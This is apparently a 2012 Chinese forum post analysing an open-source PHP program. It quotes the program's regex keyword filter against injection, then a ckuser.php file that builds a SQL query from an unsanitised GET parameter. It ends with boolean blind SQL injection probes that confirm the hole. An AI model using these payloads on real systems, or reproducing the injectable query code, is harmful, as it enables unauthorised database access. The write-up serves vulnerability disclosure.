由于程序是开源程序
并下载其程序看了一番。其实程序员还是有一点安全意识的:
防注入代码:
//要过滤的非法字符 $ArrFiltrate = array ( "#union#i", "#<script#i", "#/script>#i", "#select#i", "#alert#i", "#javascript#i", "#<table#i", "#<td#i", "#\"#i", "#\'#i", "#delete#i", "#vbscript#i", "#applet#i", "#frame#i", "#<div#i", "#update#i", "#'#i", "#union #i", "#select #i", "#delete #i", "#update #i", "#and #i", "#;#i", "#update#i" ); $replacements=''; function FunStringExist(&$array,$ArrFiltrate,$replacements) { if (is_array($array)) { foreach ($array as $key => $value) { if (is_array($value)) FunStringExist($array[$key],$ArrFiltrate,$replacements); else $array[$key] = preg_replace($ArrFiltrate, $replacements, $value); } } } FunStringExist($_GET,$ArrFiltrate,$replacements); FunStringExist($_POST,$ArrFiltrate,$replacements);
这段代码多少还是有瑕疵的、只过滤www.jb51.net get post 我们只要找调用request的地方
别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响
header("Content-Type:text/html;charset=utf-8");
include "../comm/config.php";
$uname = trim($_GET["name"]);
if($uname==''){
echo "true";
}else{
$con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB);
mysql_select_db("$dbname",$con)or die("can not choose the dbname!");
$query="select * from ".$BIAOTOU."user where ddusername='".$uname."'";
mysql_query("set names utf8");
$res=mysql_query($query);
if(mysql_num_rows($res)!=0)
{echo "true";}
else
{echo "false";}
}
首先注册一个用户.让程序能过判断
ckuser.php?name=maxadd' and 1=1 and ''='
返回true
ckuser.php?name=maxadd' and 1=2 and ''='
返回false
|
发表于 2012-6-7 08:42:44